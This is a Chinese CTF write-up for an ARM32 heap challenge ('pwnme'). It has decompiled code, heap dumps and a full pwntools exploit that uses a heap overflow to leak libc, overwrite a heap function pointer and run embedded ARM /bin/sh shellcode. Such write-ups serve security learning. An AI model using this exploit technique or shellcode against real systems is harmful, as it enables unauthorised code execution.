2020年第五空间-pwnme

June 28, 2020 CTF-Writeup 访问: 36 次

pwnme

一个arm32 pwn,而且还是堆题

我用的工具是ghidraarm的题用ida不是太舒服

动态调试,用qemu运行这个程序的时候,显示libc库错误,解决方法就是把libc.so文件重新链接一下(ln -s)

main函数分析:

void FUN_00010aa8(void)

{
  char acStack24 [8];
  int local_10;
  code **local_c;

  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,2,0);
  local_c = (code **)malloc(8);
  *local_c = FUN_0001058c;
  local_c[1] = FUN_000105a8;
  (**local_c)();
  meau();
  read(0,acStack24,8);
  local_10 = atoi(acStack24);
  switch(local_10) {
  case 1:
    show();
    break;
  case 2:
    add();
    break;
  case 3:
    edit();
    break;
  case 4:
    delete();
    break;
  case 5:
    (*local_c[1])();
                    /* WARNING: Subroutine does not return */
    exit(0);
  default:
    puts("Invalid");
  }
}

函数首先申请了8字节的堆块,里面存放了两个函数的地址(函数都是只输出一句话),然后有五个选项:

void meau(void)

{
  puts("----------------------------");
  puts("Normal Menu");
  puts("----------------------------");
  puts("1.Show");
  puts("2.Add");
  puts("3.Change");
  puts("4.Remove");
  puts("5.Exit");
  puts("----------------------------");
  printf(">>> ");
  return;
}

审计后发现在edit里面存在任意长度输入而造成堆溢出,起初我按照glibc利用手法,先进行堆块重叠,可以泄露出来libc,然后我想利用fastbin attack来修改hook,搜了一番在arm架构下并没有__malloc_hook__free_hook,然后我想到main函数开始的时候在堆中存了两个地址,然后想fastbin attack来修改这两个地址,利用的时候,发现在fastbin中链表和glibc下的不一样

0x22150:    0x0000001100000000  0x0000000000000022
0x22160:    0x0000001100000000  0x0000000000000a22
0x22170:    0x0000001100000000  0x0000000000022172
0x22180:    0x0000001100000000  0x0000000000000a44
0x22190:    0x0000001100000000  0x0000000000022152
0x221a0:    0x0000001100000000  0x0000000000000a66
0x221b0:    0x00000e5100000000  0x0000000000000000


0x2106c:    0x00022018  0x00000038  0x00022058  0x00000038
0x2107c:    0x00022098  0x00000038  0x000220d8  0x00000038
0x2108c:    0x00022098  0x00000038  0x00022118  0x00000000
0x2109c:    0x00000000  0x00000008  0x00022168  0x00000000
0x210ac:    0x00000000  0x00000008  0x00022188  0x00000000
0x210bc:    0x00000000  0x00000008  0x000221a8  0x00000000
0x210cc:    0x00000000  0x00000000  0x00000000  0x00000000

然后动态调试,尝试构造出能够分配到两个函数指针的地方,最后可以修改到,伪造的数值是一个一个根据偏移试的,然后没有one_gg,想着在堆里写入shellcode,然后把函数指针写成堆上的地址,再利用选项5来调用

exp:

from pwn import *
context.binary = "./a.out"
context.log_level='debug'
libc = ELF("./lib/libuClibc-1.0.34.so")
'''
if local:
    p = remote("106.75.126.171","33865")
elif debug:
    p = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
else:
    p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])
'''
# r = remote("121.36.58.215","1337")
# r = process(["qemu-arm", "-g", "1234", "-L", ".", "./a.out"])
r = process(["qemu-arm", "-L", ".", "./a.out"])

# r = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "baby_arm"])

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
def add(chunk_size,value):
    ru('>>> ')
    sl('2')
    ru('Length:')
    sl(str(chunk_size))
    ru('Tag:')
    sl(value)
def delete(index):
    ru('>>> ')
    sl('4')
    ru('Tag:')
    sl(str(index))
def show():
    ru('>>> ')
    sl('1')
def edit(index,len,value):
    ru('>>> ')
    sl('3')
    ru('Index:')
    sl(str(index))
    ru('Length:')
    sl(str(len))
    ru("Tag:")
    sl(value)
def debug():
    gdb.attach(r)
    raw_input()

add(0x38,"aaa")
add(0x38,"aaa")
add(0x38,"aaa")
add(0x38,"aaa")
edit(0,0x49,"\x11"*0x38+p32(0)+p32(0x81)+"\x22"*8)
delete(1)
add(0x38,"aaa")
show()
ru("2 : ")
libc_base = u32(r.recv(4))-0x9a8ec
system = libc_base + libc.symbols['system']
li("libc_base",libc_base)
li("system",system)
li("stack",libc.symbols['environ']+libc_base)
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
add(0x38,"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41")
add(8,"\x11")#6
add(8,"\x22")#7
add(8,"\x33")#8
add(8,"\x44")#9
add(8,"\x55")#10
add(8,"\x66")#11
delete(6)
delete(8)
delete(10)
add(8,"\x99")
edit(7,0x20,"a"*8+p32(0)+p32(0x11)+p32(0x22022))
add(8,"\x99")
# add(8,p32(0x51800+libc_base)+p32(0x51800+libc_base))
ru('>>> ')
sl('2')
ru('Length:')
sl(str(8))
ru('Tag:')
sd(p32(0x22098)+p32(0x22098))
# shellcode = asm(shellcraft.aarch64.sh())
# edit(6,0x20,"a"*0x8+p32(0)+p32(0x11)+p32(0x22008))
ru('>>> ')
sl("5")
# show()
ri()
赛后看别人wp,说arm下 fastbin的链表fd指针是异或的

添加新评论